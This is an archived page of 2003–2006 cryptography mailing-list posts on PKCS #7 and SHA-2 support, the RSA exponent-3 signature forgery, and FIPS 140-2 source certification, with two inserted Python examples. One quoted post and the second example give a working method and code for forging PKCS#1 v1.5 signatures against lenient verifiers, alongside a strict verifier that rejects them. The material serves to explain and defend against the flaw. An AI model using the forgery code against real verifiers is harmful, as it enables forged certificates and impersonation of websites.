RE: OpenSSL PKCS #7 supports AES & SHA-2 ?

2006-10-13 Thread Tolga Acar
Read RFC4055 for RSA with various hashes, OAEP, and PSS combinations.

- Tolga

 -Original Message-
 [mailto:[EMAIL PROTECTED] On Behalf Of Alex Alten
 Sent: Tuesday, October 10, 2006 9:47 AM
 To: Russ Housley;
 Subject: Re: OpenSSL PKCS #7 supports AES & SHA-2 ?
 OK.  I found SHA-2 in RFC 4634 (only 3 months old), which refers back to FIPS 180-2.
 But I reach a dead-end with PKCS #7 (now RFC 3852).  There's no support for algorithm types (RFC 3279).  Also PKCS #1 (now RFC 3447) needs an update for SHA-2 with RSA encryption (OIDs, etc.).
 Did I miss something or do you need help in updating these, since I, and probably others too, need them?
 - Alex
 At 01:19 PM 10/9/2006 -0400, Russ Housley wrote:
 PKCS#7 has been turned over to the IETF for maintenance.  The most recent version is RFC 3852.  Since the protocol is more stable than the cryptographic algorithms, the algorithm discussion appears in separate RFCs.
 TLS 1.2 is under development in the IETF.  It is being done in such a way that none of the ciphersuites that have already been defined need to be updated, including the ones that use AES and the SHA-2 family.
 At 01:28 AM 10/7/2006, Alex Alten wrote:
 After reading PKCS #1 v2 more closely, SHA-2 is not even in the specs; therefore OpenSSL PKCS #7 functions won't support SHA-2.  This spec was last updated in 1998.
 PKCS Editor, is there a new update in progress by RSA Labs to SHA-2 and AES?
 Does OpenSSL implement PKCS #1 v2 or just v1.5?  If the latter then not even SHA-1 is supported.
 PKCS editor, is there any timeline as to when PKCS #7 will then be updated with references to official OIDs, etc., for specifying SHA-2 and AES?
 Dr. Ron Rivest, are you going to publish new message-digest and SHA-2?  (So that they can be referenced by an updated PKCS #7.)
 Mr. Russ Housley, can you weigh in with what's happening in the IETF WG security area?  I know that Mr. Eric Rescorla is working on a new TLS v1.2 draft.  Will this be done/ratified soon?  I assume OpenSSL will incorporate this soon thereafter?
 This mess with the MD5 and SHA-1 hashes is really starting to become a problem.
 It's certainly impacting new development projects/products I'm involved with using SSL and PKI certificates.  My customers are concerned about using MD5 and SHA-1, and they don't want to keep paying for implementations repeatedly as the standards catch up to reality.  Updating these various heavily used standards quickly is quite important.
 Sincerely (and thanks in advance for all of your replies),
 - Alex
 At 09:05 AM 10/6/2006 -0700, Alex Alten wrote:
 Does anyone know if the OpenSSL PKCS #7 functions support AES and SHA-2?
 (I'm assuming OpenSSL 0.9.7 or later.)
 - Alex
 Alex Alten
 Alten Security Engineering, Inc.

The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
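The identifiers Alex is asking about live in RFC 3279 (SHA-1 with RSA), RFC 4055 (the SHA-2 family with RSA, Tolga's pointer) and RFC 3447 (the DigestInfo that RSASSA-PKCS1-v1_5 pads and signs). The following Python is an added example, not code from the thread and not OpenSSL's: it DER-encodes those AlgorithmIdentifier and DigestInfo structures from the dotted OIDs and derives the per-hash DigestInfo prefix that RFC 3447 publishes as a constant. Nothing in it is assumed beyond the standardized OIDs; the message bytes are sample input. RFC 4055's parameterised RSASSA-PSS-params and RSAES-OAEP-params structures are not covered by this minimal encoder.

```python
import hashlib

# Object identifiers from RFC 3279 (sha1, sha1WithRSAEncryption),
# RFC 4055 (the SHA-2 family with RSA) and RFC 3447 (DigestInfo).
OIDS = {
    "sha1": "1.3.14.3.2.26",
    "sha256": "2.16.840.1.101.3.4.2.1",
    "sha384": "2.16.840.1.101.3.4.2.2",
    "sha512": "2.16.840.1.101.3.4.2.3",
    "sha1WithRSAEncryption": "1.2.840.113549.1.1.5",
    "sha256WithRSAEncryption": "1.2.840.113549.1.1.11",
    "sha384WithRSAEncryption": "1.2.840.113549.1.1.12",
    "sha512WithRSAEncryption": "1.2.840.113549.1.1.13",
}


def der_length(n: int) -> bytes:
    """DER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + der_length(len(body)) + body


def der_oid(dotted: str) -> bytes:
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, remaining arcs
    base-128 with a continuation bit on every byte but the last."""
    arcs = [int(a) for a in dotted.split(".")]
    body = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        body += bytes(reversed(chunk))
    return der_tlv(0x06, bytes(body))


def algorithm_identifier(oid: str) -> bytes:
    """AlgorithmIdentifier ::= SEQUENCE { algorithm OID, parameters NULL }.
    RFC 4055 requires NULL parameters for these RSA and SHA-2 identifiers."""
    return der_tlv(0x30, der_oid(oid) + b"\x05\x00")


def digest_info(hash_name: str, msg: bytes) -> bytes:
    """DigestInfo ::= SEQUENCE { digestAlgorithm AlgorithmIdentifier,
    digest OCTET STRING }, the value EMSA-PKCS1-v1_5 pads (RFC 3447 9.2)."""
    digest = hashlib.new(hash_name, msg).digest()
    return der_tlv(0x30, algorithm_identifier(OIDS[hash_name]) + der_tlv(0x04, digest))


def digest_info_prefix(hash_name: str) -> bytes:
    """Everything in DigestInfo that precedes the hash value: the constant a
    verifier can hard-code per hash, as the note to RFC 3447 9.2 does."""
    di = digest_info(hash_name, b"")
    return di[: len(di) - hashlib.new(hash_name).digest_size]


if __name__ == "__main__":
    for name in ("sha1", "sha256", "sha384", "sha512"):
        print(name, digest_info_prefix(name).hex())
    print("sha256WithRSAEncryption",
          algorithm_identifier(OIDS["sha256WithRSAEncryption"]).hex())
```

The derived SHA-1 prefix is the 15-byte `30 21 30 09 06 05 2b 0e 03 02 1a 05 00 04 14` constant and the SHA-256 one is `30 31 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20`; a verifier that compares the whole DigestInfo against such a constant, rather than parsing the ASN.1 it finds in the decrypted block, is also the one that is immune to the padding-parsing problems discussed further down this page.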

RE: Exponent 3 damage spreads...

2006-09-21 Thread Tolga Acar

Here is what I compute in Maple.
I wonder if you are running into an old BC bug. I don't remember the
details, but bc had a bug some 10 years or so ago with big numbers.

 c:=s^3 mod m:
 c2:=m^3 mod s:

 -Original Message-
 [mailto:[EMAIL PROTECTED] On Behalf Of Anton Stiglic
 Sent: Tuesday, September 19, 2006 8:56 PM
 Cc: 'Anton Stiglic'
 Subject: RE: Exponent 3 damage spreads...
 I tried coming up with my own forged signature that could be validated with OpenSSL (which I intended to use to test other libraries).  I haven't succeeded, either because in the particular example I came up with OpenSSL does something that catches the invalid signature, or I messed up somewhere (the likelihood of which is far from negligible).  Unfortunately, I don't have much more time to play with this.  I decided to share the methodology I used with those of you who are interested in case the info is helpful to anyone, or someone can tell me why the signature I produced doesn't get validated by OpenSSL.
 I followed the instructions of Hal Finney's excellent post:
 I started out by generating a 3072-bit RSA key pair, with public exponent e = 3.
 openssl genrsa -des3 -3 -out my.key 3072
 The resulting key can be found below; the password is "test" if you ever want to use it.
 Then I created the corresponding public key certificate:
 openssl req -new -x509 -days 1001 -key my.key -out my.cer
 The public key certificate can be found below as well.  You can import this in

RE: Real World Exploit for Bleichenbachers Attack on SSL fromCrypto'06 working

2006-09-15 Thread Tolga Acar
You need to have one zero octet after a bunch of FFs and before the DER-encoded
hash blob in order to have a proper PKCS#1v1.5 signature encoding.

Based on what you say below ("I used this cert and my key to sign an
end-entity certificate which I used to set up a webserver"), it appears that
the implementations you used don't check for this one zero octet, either.

- Tolga 

 -Original Message-
 [mailto:[EMAIL PROTECTED] On Behalf Of Erik Tews
 Sent: Thursday, September 14, 2006 3:40 PM
 To: Cryptography
 Subject: Real World Exploit for Bleichenbachers Attack on SSL 
 fromCrypto'06 working
 I had an idea very similar to the one Peter Gutmann had this morning.  I managed to write a real world exploit which takes as input:
   * a CA certificate using 1024-bit RSA and exponent 3 (ca-in)
   * a public key, using an algorithm and size of your choice
 and generates a CA certificate signed by ca-in, using public key key-in.
 At least 3 major web browsers on the market are shipped by default with CA certificates which have signed other intermediate CAs which use rsa1024 with exponent 3, in their current version.  With this exploit, you can now sign arbitrary server certificates for any website of your choice, which are accepted by all 3 web browsers without any kind of SSL warning message.
 I used the following method:
 I first generated a certificate, with BasicConstraints set to True, Public Key set to one of my keys, and Issuer to the DN of a CA using 1024-bit RSA with exponent 3.  I used usual values for all the other fields.  When I signed a certificate I shifted all my data to the left.  I had 46 bytes of fixed value (this can perhaps be reduced to 45 bytes, I have not checked yet, but even with 46, this attack works).  They had the form 00 01 FF FF FF FF FF FF FF FF ASN1DataWithHash.  This gives me 82 bytes I can fill with arbitrary values (at least, if the implementation skips some part of the ASN.1 data, I can choose some bytes there too).
 If you now set all the bytes right of your ASN1DataWithHash to 00, and interpret that as a number n, and compute:
     y = (ceil(cubeRoot(n)))^3
 where ceil means rounding to the next bigger natural number and cubeRoot computes the third root in R, y will be a perfect cube and have the form:
     00 01 FF FF FF FF FF FF FF FF ASN1DataWithHash' Garbage
 and ASN1DataWithHash' looks quite similar to your original ASN1DataWithHash, with perhaps 2-3 rightmost bytes changed.  These bytes are part of the certificate hash value.
 This signature is useless, because every certificate has a fixed hash value.  But you don't need to sign a fixed certificate.  So I started adding some seconds to the notAfter value of the certificate and computed the hash again.  I brute forced until I had a certificate where the computation of y did not alter any bytes of the ASN1DataWithHash.
 I had to try 275992 different values which took 2-3 minutes on my 1.7 GHz Pentium using an unoptimized Java implementation.
 I used this cert and my key to sign an end-entity certificate which I used to set up a webserver.
 I have to check some legal aspects before publishing the names of the browsers which accepted this certificate and the names of the CA certificates with exponent 3 I used, in some hours, if nobody tells me not to do that.  Depending on the advice I get, I will release the source code of the exploit too.
 Thanks go to Alexander May and Ralf-Philipp Weinmann who helped me.

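Erik's procedure, and the e=3 setup Anton was experimenting with in the Exponent 3 thread above, as an added Python example. This is neither Erik's exploit (unreleased at the time of the post) nor Anton's OpenSSL test; it is a stand-alone illustration with these assumptions: `demo_modulus` is a constructed stand-in for the CA's modulus (the forgery never needs the private key, so any odd integer of the right size exercises the same arithmetic); the `tbs` bytes stand in for the DER TBSCertificate, and appending a counter stands in for bumping notAfter by a second; the SHA-1 DigestInfo prefix is RFC 3447's constant; `lenient_verify` models the class of parser that accepted these signatures, not any particular browser or library. It goes a little beyond the post: it also runs at 3072 bits, where rounding never disturbs the fixed part and one attempt always suffices, and at 1024 bits both with and without the zero separator Tolga mentions, so the size of the search can be seen directly.

```python
import hashlib
import hmac
import random

# RFC 3447 DigestInfo prefix for SHA-1, the hash in use in this thread.
SHA1_DIGESTINFO_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")


def digest_info_sha1(msg: bytes) -> bytes:
    return SHA1_DIGESTINFO_PREFIX + hashlib.sha1(msg).digest()


def demo_modulus(bits: int, seed: int = 1) -> int:
    """Constructed stand-in for the e=3 CA's modulus (assumption, not a real key).
    The forgery never touches a private key, so any odd integer of the right
    size behaves like the real n for this purpose."""
    rng = random.Random(seed)
    return (1 << (bits - 1)) | rng.getrandbits(bits - 2) | 1


def icbrt_ceil(n: int) -> int:
    """Smallest integer x with x**3 >= n, by integer Newton iteration."""
    if n <= 0:
        return 0
    x = 1 << ((n.bit_length() + 2) // 3)   # starts at or above the real cube root
    while True:
        y = (2 * x + n // (x * x)) // 3
        if y >= x:
            break
        x = y
    return x if x ** 3 >= n else x + 1     # x is floor(cbrt(n)) at this point


def emsa_pkcs1_v15(msg: bytes, k: int) -> bytes:
    """Correct EMSA-PKCS1-v1_5 encoding: 00 01 FF..FF 00 DigestInfo, exactly k bytes."""
    t = digest_info_sha1(msg)
    ps_len = k - len(t) - 3
    if ps_len < 8:
        raise ValueError("modulus too short for this hash")
    return b"\x00\x01" + b"\xff" * ps_len + b"\x00" + t


def strict_verify(sig: int, n: int, msg: bytes) -> bool:
    """Re-encode and compare the whole block; nothing attacker-controlled is parsed."""
    k = (n.bit_length() + 7) // 8
    em = pow(sig, 3, n).to_bytes(k, "big")
    return hmac.compare_digest(em, emsa_pkcs1_v15(msg, k))


def lenient_verify(sig: int, n: int, msg: bytes) -> bool:
    """Models the parsers that fell to this attack: skips the padding, treats the
    00 separator as optional (Tolga's point) and never looks past the hash."""
    k = (n.bit_length() + 7) // 8
    em = pow(sig, 3, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if i < k and em[i] == 0x00:            # flaw 1: the separator should be mandatory
        i += 1
    t = digest_info_sha1(msg)
    return em[i:i + len(t)] == t            # flaw 2: trailing bytes are never examined


def forge_signature(msg: bytes, n: int, with_separator: bool = True, max_tries: int = 1):
    """Erik's method: fixed left part, zeros on the right, cube of the rounded-up
    cube root; retry with a tweaked message until rounding leaves the fixed part
    intact.  Returns (message_actually_signed, signature, attempts) or None."""
    k = (n.bit_length() + 7) // 8
    for i in range(max_tries):
        candidate = msg if i == 0 else msg + b" notAfter+%d" % i   # stand-in for bumping notAfter
        sep = b"\x00" if with_separator else b""
        prefix = b"\x00\x01" + b"\xff" * 8 + sep + digest_info_sha1(candidate)
        target = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
        s = icbrt_ceil(target)
        y = s ** 3                       # y < n, so pow(s, 3, n) == y without any private key
        if y.to_bytes(k, "big").startswith(prefix):
            return candidate, s, i + 1
    return None


if __name__ == "__main__":
    tbs = b"constructed stand-in for the TBSCertificate bytes"
    n = demo_modulus(3072)
    cand, sig, tries = forge_signature(tbs, n)
    print("3072-bit: forged in", tries, "attempt; lenient",
          lenient_verify(sig, n, cand), "strict", strict_verify(sig, n, cand))
    n = demo_modulus(1024)
    res = forge_signature(tbs, n, with_separator=False, max_tries=200_000)
    print("1024-bit, no separator:", res and res[2], "attempts")
    res = forge_signature(tbs, n, max_tries=3_000_000)   # about 2**18 attempts expected; minutes in CPython
    print("1024-bit, with separator:", res and res[2], "attempts")
```

The search size follows from the rounding error: with s = ceil(cbrt(target)) the cube overshoots target by at most about 3·s², which for a 1024-bit block is a number of roughly 674 bits, while the free space to the right of the fixed part is 82 bytes (656 bits) with the separator and 83 bytes (664 bits) without it. The fixed part therefore survives with probability on the order of 2^-18 in the first case (Erik's 275992 attempts are in line with this) and 2^-10 in the second; at 3072 bits the free space is far larger than the error and no search is needed, which is why a 3072-bit e=3 key makes a convenient test case. Only `strict_verify` rejects every forgery here, because it compares the whole decrypted block against the one encoding it expects instead of parsing whatever it finds.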

RE: RSA Implementation in C language

2004-12-01 Thread Tolga Acar
Try Intel's open-sourced CDSA, available at SourceForge.

- Tolga

 -Original Message-
 From: [EMAIL PROTECTED] [mailto:owner-
 [EMAIL PROTECTED] On Behalf Of Trei, Peter
 Sent: Tuesday, November 30, 2004 7:16
 Subject: RE: RSA Implementation in C language
 Admittedly somewhat old and creaky, but try Googling
 RSAREF. I don't know where that stands for IP rights
 (presumably we still have copyright), but for
 research it's a starting point.
  -Original Message-
  [mailto:[EMAIL PROTECTED] Behalf Of Sandeep N
  Sent: Monday, November 29, 2004 3:17 AM
  Subject: RSA Implementation in C language
  Can anybody tell me where I can get an implementation of RSA
  algorithm in C language? I searched for it, but could not locate one.
  I would be grateful to you if you could give me the location of the
  source code.
  Thanks and Regards,

Re: OpenSSL *source* to get FIPS 140-2 Level 1 certification

2003-09-08 Thread Tolga Acar
On second thought, since there is no key management algorithm
certified, how would one set up an SSL connection in FIPS mode?

It seems to me that it is not possible to have a FIPS 140-certified
SSL/TLS session using OpenSSL's certification.

- Tolga


Re: OpenSSL *source* to get FIPS 140-2 Level 1 certification

2003-09-06 Thread Tolga Acar
Joshua Hill wrote:

 On Fri, Sep 05, 2003 at 04:05:07PM -0400, Rich Salz wrote:

  It is the first *source code* certification.

 The ability to do this runs counter to my understanding of FIPS 140-2.

... and to experiences with the previous FIPS 140-1 certifications I was
involved in, including a fairly recent communication from NIST that
defines a crypto module: it is not a statically linked library, and
that it ought to be an executable or a shared library (so, dll).

 Second, it is unclear to me what would be tested during operational
 testing.  The source code can't itself be a module, because the source
 code doesn't do anything until it is compiled and run. FIPS 140-2
 currently only allows for fully functional units to be modules; you'll
 note, for instance, that FIPS certs for software modules are listed as
 a multi-chip standalone embodiment, for instance.  NIST was talking
 about producing documents that would support a true software only
 embodiment, but that initiative seems to have stalled with the change
 of directors of the CMVP (the NIST group that issues FIPS 140-2 certs).

Can you say that the C/asm source code is the code that constitutes a
module, and define compiler/linker/OS/CPU as your execution
environment for FIPS 140 purposes? Think Java, for instance.
I realize this is stretching it too thin, and I can think of lots of reasons
why it can't be. But...

 Third, nominally, the FIPS certificate only applies to the particular
 operating system (and OS version) that the operational testing was
 done on.  For level 1 modules, NIST has historically allowed OSes in
 the same family to also be covered, and they have been very liberal
 in their definition of family.

I have seen evidence that this restriction has become exceptionally
loose, and that the family can be as broad as UNIX-like systems...

- Tolga
